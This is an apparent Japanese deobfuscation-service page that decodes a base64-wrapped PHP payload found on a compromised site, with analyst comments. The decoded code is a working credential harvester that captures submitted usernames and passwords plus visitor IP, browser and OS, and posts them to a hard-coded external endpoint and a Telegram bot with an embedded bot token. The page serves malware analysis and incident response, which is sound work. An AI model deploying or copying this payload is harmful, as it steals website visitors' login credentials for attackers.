
PHP 難読化コードの復元・デコード

WordPress などで見つかった PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php eval(base64_decode('CiBpZiAoZW1wdHkoJF9QT1NUWyJceDU1XHg3M1wxNDVcMTYyXHg2ZVwxNDFcMTU1XHg2NSJdKSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVx4NzJceDZlXHg2MVx4NmRceDY1Il0pID4gNTApIHsgJG5hbWVFcnIgPSAiXDQwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVw...



難読化されたPHPコード

<?php eval(base64_decode('CiBpZiAoZW1wdHkoJF9QT1NUWyJceDU1XHg3M1wxNDVcMTYyXHg2ZVwxNDFcMTU1XHg2NSJdKSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVx4NzJceDZlXHg2MVx4NmRceDY1Il0pID4gNTApIHsgJG5hbWVFcnIgPSAiXDQwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NTVcMTYzXDE0NVwxNjJceDZlXDE0MVx4NmRcMTQ1Il0pIDwgMSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlIHsgJGlwID0gZ2V0ZW52KCJcMTIyXDEwNVx4NGRcMTE3XHg1NFwxMDVcMTM3XDEwMVwxMDRceDQ0XHg1MiIpOyAkcG9ydCA9ICRfU0VSVkVSWyJceDUyXHg0NVx4NGRceDRmXHg1NFwxMDVcMTM3XHg1MFwxMTdcMTIyXDEyNCJdOyAkaG9zdG5hbWUgPSBnZXRob3N0YnlhZGRyKCRpcCk7ICR1c2VyX2FnZW50ID0gJF9TRVJWRVJbIlwxMTBceDU0XHg1NFx4NTBceDVmXDEyNVx4NTNceDQ1XHg1MlwxMzdceDQxXHg0N1x4NDVceDRlXDEyNCJdOyBmdW5jdGlvbiBnZXRfYnJvd3Nlcl9uYW1lKCR1c2VyX2FnZW50KSB7IGlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTA2XHg2OVx4NzJcMTQ1XHg2Nlx4NmZceDc4IikgIT09IGZhbHNlKSB7IHJldHVybiAiXDEwNlwxNTFceDcyXHg2NVwxNDZcMTU3XDE3MCI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJceDQzXHg2OFwxNjJcMTU3XHg2ZFx4NjUiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDQzXDE1MFx4NzJcMTU3XDE1NVx4NjUiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyM1x4NjFceDY2XDE0MVx4NzJcMTUxIikgIT09IGZhbHNlKSB7IHJldHVybiAiXHg1M1x4NjFceDY2XHg2MVwxNjJcMTUxIjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMDVceDY0XHg2N1wxNDUiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDQ1XDE0NFx4NjdceDY1IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMTVceDUzXDExMVwxMDUiKSAhPT0gZmFsc2UgfHwgc3RycG9zKCR1c2VyX2FnZW50LCAiXHg1NFwxNjJceDY5XHg2NFwxNDVcMTU2XHg3NCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NDlceDZlXDE2NFx4NjVceDcyXHg2ZVwxNDVceDc0XDQwXDEwNVwxNzBceDcwXHg2Y1x4NmZceDcyXDE0NVwxNjIiOyB9IGVsc2UgeyByZXR1cm4gIlx4NTVceDZlXDE1M1wxNTZcMTU3XHg3N1wxNTYiOyB9IH0gZnVuY3Rpb24gZ2V0X29zKCR1c2VyX2FnZW50KSB7IGlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJceDU3XDE1MVx4NmVceDY0XDE1N1x4NzdceDczXDQwXHg0ZVwxMjRceDIwXDYxXDYwXDU2XHgzMCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NTdcMTUxXHg2ZVx4NjRceDZmXHg3N1x4NzNcNDBcNjFcNjAiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyN1wxNTFceDZlXDE0NFx4NmZceDc3XDE2M1w0MFx4NGVcMTI0XDQwXHgzNlx4MmVcNjMiKS
AhPT0gZmFsc2UpIHsgcmV0dXJuICJcMTI3XHg2OVwxNTZcMTQ0XHg2ZlwxNjdceDczXDQwXDcwXHgyZVx4MzEiOyB9IGVsc2VpZiAoc3RycG9zKCR1c2VyX2FnZW50LCAiXDEyN1x4NjlcMTU2XHg2NFwxNTdcMTY3XHg3M1w0MFwxMTZcMTI0XDQwXHgzNlx4MmVcNjIiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJceDU3XHg2OVx4NmVcMTQ0XHg2Zlx4NzdcMTYzXDQwXHgzOCI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTI3XHg2OVx4NmVceDY0XDE1N1x4NzdcMTYzXDQwXDExNlwxMjRceDIwXDY2XHgyZVw2MSIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlx4NTdcMTUxXHg2ZVx4NjRcMTU3XDE2N1x4NzNceDIwXDY3IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlx4NGRcMTQxXDE0M1x4NjlcMTU2XDE2NFwxNTdcMTYzXDE1MCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxMTVcMTQxXDE0M1x4MjBcMTE3XHg1MyI7IH0gZWxzZWlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICJcMTE0XHg2OVwxNTZcMTY1XDE3MCIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxMTRcMTUxXDE1NlwxNjVcMTcwIjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlwxMDFcMTU2XDE0NFwxNjJcMTU3XHg2OVwxNDQiKSAhPT0gZmFsc2UpIHsgcmV0dXJuICJcMTAxXHg2ZVwxNDRceDcyXDE1N1wxNTFceDY0IjsgfSBlbHNlaWYgKHN0cnBvcygkdXNlcl9hZ2VudCwgIlx4NjlcMTIwXDE1MFx4NmZceDZlXDE0NSIpICE9PSBmYWxzZSkgeyByZXR1cm4gIlwxNTFcMTE3XHg1MyI7IH0gZWxzZSB7IHJldHVybiAiXHg1NVx4NmVceDZiXHg2ZVwxNTdceDc3XDE1NiI7IH0gfSAkYnJvd3NlciA9IGdldF9icm93c2VyX25hbWUoJHVzZXJfYWdlbnQpOyAkaW5mbyA9IGdldF9vcygkdXNlcl9hZ2VudCk7ICRVc2VybmFtZSA9ICRfUE9TVFsiXHg1NVx4NzNceDY1XDE2Mlx4NmVcMTQxXDE1NVwxNDUiXTsgJFBhc3N3b3JkID0gJF9QT1NUWyJceDUwXHg2MVwxNjNcMTYzXHg3N1wxNTdcMTYyXHg2NCJdOyAkZGF0YSA9IGFycmF5KCJcMTI1XDE2M1x4NjVceDcyXDE1Nlx4NjFcMTU1XHg2NSIgPT4gJFVzZXJuYW1lLCAiXHg1MFwxNDFcMTYzXDE2M1x4NzdceDZmXDE2MlwxNDQiID0+ICRQYXNzd29yZCk7ICR1cmwgPSAiXDE1MFx4NzRceDc0XDE2MFwxNjNcNzJceDJmXHgyZlx4MzVcNjNceDYxXDE0Mlx4MzFcNjJcNjNcNTZceDYxXDE0Mlx4MzFceDMyXHgzM1w3MFx4MzJcNjNcNjNcNjJceDJlXDcxXHgzNlx4MmVceDZjXDE2NFx4MmZcMTQ0XHg2OVx4NzNcMTYyXHg2NVw1NlwxNjBceDY4XHg3MCI7ICRvcHRpb25zID0gYXJyYXkoQ1VSTE9QVF9VUkwgPT4gJHVybCwgQ1VSTE9QVF9QT1NUID0+IDEsIENVUkxPUFRfUE9TVEZJRUxEUyA9PiBodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlKTsgJGN1cmwgPSBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHRfYXJyYXkoJGN1cmwsICRvcHRpb25zKTsgJHJlc3Bvbn
NlID0gY3VybF9leGVjKCRjdXJsKTsgY3VybF9jbG9zZSgkY3VybCk7ICRib3RUb2tlbiA9ICJcNjdcNjJcNjBcNzBcNjJcNjdcNjJcNjJcNjZceDMwXDcyXHg0MVx4NDFcMTEwXDE0N1wxMTdcMTU3XHg0NlwxMzdceDc1XHg2MlwxNDFceDU1XHg0Nlw2MlwxMTdceDMzXHg2OFwxNDVcMTcyXHg3M1x4NjZceDQ0XDE1MVwxNDFcMTYwXDcwXHgzNlx4NmVcMTE1XHg1M1x4MzRcMTYzXDE2MlwxNzBcMTE1IjsgJGNoYXRJZCA9ICJcNjZcNjZceDM5XHgzMVx4MzNcNjVcNjZceDMyXDY0XDYzIjsgJHVybCA9ICJcMTUwXDE2NFwxNjRceDcwXDE2M1x4M2FcNTdcNTdceDYxXHg3MFx4NjlcNTZcMTY0XHg2NVx4NmNcMTQ1XHg2N1x4NzJceDYxXHg2ZFx4MmVceDZmXDE2MlwxNDdcNTdcMTQyXDE1N1x4NzR7JGJvdFRva2VufVx4MmZcMTYzXDE0NVwxNTZceDY0XDExNVx4NjVceDczXHg3M1x4NjFcMTQ3XDE0NVx4M2ZceDYzXDE1MFx4NjFceDc0XHg1Zlx4NjlceDY0XDc1eyRjaGF0SWR9XHgyNlx4NzRceDY1XDE3MFwxNjRceDNkXDEyNVwxNjNceDY1XHg3MlwxNTZcMTQxXDE1NVwxNDVceDNhXDQweyRVc2VybmFtZX1cNDVceDMwXHg0MVwxMjBceDYxXDE2M1x4NzNceDc3XHg2Zlx4NzJcMTQ0XDcyXHgyMHskUGFzc3dvcmR9XHgyNVw2MFwxMDFceDQyXDE2MlwxNTdcMTY3XHg3M1wxNDVcMTYyXDcyXDQweyRicm93c2VyfVx4MjVcNjBceDQxXHg0ZlwxNjBceDY1XDE2MlwxNDFcMTY0XHg2OVx4NmVceDY3XHgyMFx4NzNcMTcxXDE2M1x4NzRceDY1XDE1NVx4M2FcNDB7JGluZm99XDQ1XHgzMFx4NDFcMTAzXHg2Y1wxNTFceDY1XHg2ZVx4NzRcNDBceDY5XDE2MFx4M2FcNDB7JGlwfVw0NVx4MzBceDQxXHgzZFx4M2RceDNkXDc1XHgzZFx4M2RcNzVcNzVceDNkXHgzZFx4M2RceDNkXDc1XHgyYlw0MFwxMzNcNDBceDQzXDE2Mlx4NjVceDYxXHg3NFx4NjVcMTQ0XDQwXDE0MlwxNzFcNDBcMTE3XDE1NVwxNDVceDQ3XHg2MVwxMTRcMTU3XHg3Mlx4NDRcNDBceDVkXDQwXHgyYlx4M2RceDNkXDc1XDc1XHgzZFx4M2RceDNkXHgzZFw3NVw3NVx4M2RceDNkXHgzZCI7ICRzdHJlYW1PcHRpb25zID0gYXJyYXkoIlx4NzNceDczXHg2YyIgPT4gYXJyYXkoIlx4NzZcMTQ1XHg3MlwxNTFceDY2XDE3MVwxMzdcMTYwXDE0NVwxNDVcMTYyIiA9PiBmYWxzZSwgIlx4NzZceDY1XHg3MlwxNTFceDY2XDE3MVx4NWZceDcwXDE0NVx4NjVcMTYyXDEzN1x4NmVceDYxXDE1NVwxNDUiID0+IGZhbHNlKSwgIlx4NjhcMTY0XDE2NFx4NzAiID0+IGFycmF5KCJceDZkXDE0NVx4NzRceDY4XHg2Zlx4NjQiID0+ICJcMTIwXDExN1x4NTNcMTI0IikpOyAkY29udGV4dCA9IHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkc3RyZWFtT3B0aW9ucyk7ICRoYW5kbGUgPSBmb3BlbigkdXJsLCAiXDE2MiIsIGZhbHNlLCAkY29udGV4dCk7ICRyZXNwb25zZSA9IHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSk7IGZjbG9zZSgkaGFuZGxlKTsgZWNobyAkcmVzcG9uc2U7IH0g'));



?>

デコード(難読化解除)されたコード

<?php

// Analyst note: "eval { ... }" is how the deobfuscator renders the decoded
// eval(base64_decode('...')) payload; it is not valid PHP as written and is
// meant for reading only.
//
// Summary: when a form posts a Username, this payload copies the submitted
// Username and Password, together with the visitor's IP address and browser/OS
// labels, to two hard-coded destinations (an HTTPS endpoint and a Telegram bot
// chat). In other words it is a credential harvester. The hard-coded URL, bot
// token, chat id and the "Created by" banner below are usable as indicators
// when searching other files on the host and outbound request logs. A web
// server with no business reason to reach api.telegram.org can have that
// egress blocked or alerted on.
eval {
    // Gate: the exfiltration branch runs only when POST "Username" is
    // non-empty and at most 50 bytes long. $nameErr is set to a single space
    // in the rejected cases and is not read anywhere in this payload.
    if (empty($_POST["Username"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["Username"]) > 50) {
        $nameErr = " ";
    } elseif (strlen($_POST["Username"]) < 1) {
        // Unreachable in practice: a zero-length value is already caught by empty() above.
        $nameErr = " ";
    } else {
        // Visitor fingerprinting. $port and $hostname are collected but never
        // used later in this payload; gethostbyaddr() performs a reverse DNS
        // lookup for the client address.
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $user_agent = $_SERVER["HTTP_USER_AGENT"];
        // Maps the User-Agent string to a browser label by substring search;
        // the first matching branch wins, otherwise "Unknown". Declared inside
        // the else branch, so it only exists once this branch has executed.
        function get_browser_name($user_agent)
        {
            if (strpos($user_agent, "Firefox") !== false) {
                return "Firefox";
            } elseif (strpos($user_agent, "Chrome") !== false) {
                return "Chrome";
            } elseif (strpos($user_agent, "Safari") !== false) {
                return "Safari";
            } elseif (strpos($user_agent, "Edge") !== false) {
                return "Edge";
            } elseif (strpos($user_agent, "MSIE") !== false || strpos($user_agent, "Trident") !== false) {
                return "Internet Explorer";
            } else {
                return "Unknown";
            }
        }
        // Maps the User-Agent string to an operating-system label the same
        // way (ordered substring checks, "Unknown" as the fallback).
        function get_os($user_agent)
        {
            if (strpos($user_agent, "Windows NT 10.0") !== false) {
                return "Windows 10";
            } elseif (strpos($user_agent, "Windows NT 6.3") !== false) {
                return "Windows 8.1";
            } elseif (strpos($user_agent, "Windows NT 6.2") !== false) {
                return "Windows 8";
            } elseif (strpos($user_agent, "Windows NT 6.1") !== false) {
                return "Windows 7";
            } elseif (strpos($user_agent, "Macintosh") !== false) {
                return "Mac OS";
            } elseif (strpos($user_agent, "Linux") !== false) {
                return "Linux";
            } elseif (strpos($user_agent, "Android") !== false) {
                return "Android";
            } elseif (strpos($user_agent, "iPhone") !== false) {
                return "iOS";
            } else {
                return "Unknown";
            }
        }
        $browser = get_browser_name($user_agent);
        $info = get_os($user_agent);
        // Raw credentials taken from the submitted form. Only Username went
        // through the length gate above; Password is read without any check.
        $Username = $_POST["Username"];
        $Password = $_POST["Password"];
        // Channel 1: form-encoded POST of the captured Username/Password to a
        // hard-coded HTTPS endpoint via cURL. The reply is stored in $response
        // but overwritten further down before anything reads it.
        $data = array("Username" => $Username, "Password" => $Password);
        $url = "https://53ab123.ab12382332.96.lt/disre.php";
        $options = array(CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true);
        $curl = curl_init();
        curl_setopt_array($curl, $options);
        $response = curl_exec($curl);
        curl_close($curl);
        // Channel 2: the same credentials plus browser, OS and client IP are
        // placed in the query string of a Telegram Bot API sendMessage URL.
        // $botToken and $chatId are hard-coded and identify the receiving bot
        // and chat. The values are interpolated as-is, so the credentials sit
        // in the request URL itself rather than in a request body.
        $botToken = "7208272260:AAHgOoF_ubaUF2O3hezsfDiap86nMS4srxM";
        $chatId = "6691356243";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=Username: {$Username}%0APassword: {$Password}%0ABrowser: {$browser}%0AOperating system: {$info}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] +=============";
        // The stream context turns off TLS certificate and host-name
        // verification and sets the HTTP method to POST; opening the URL with
        // fopen() is what sends the request.
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        // The Telegram API reply is written into the page output returned to
        // the visitor.
        echo $response;
    }
};

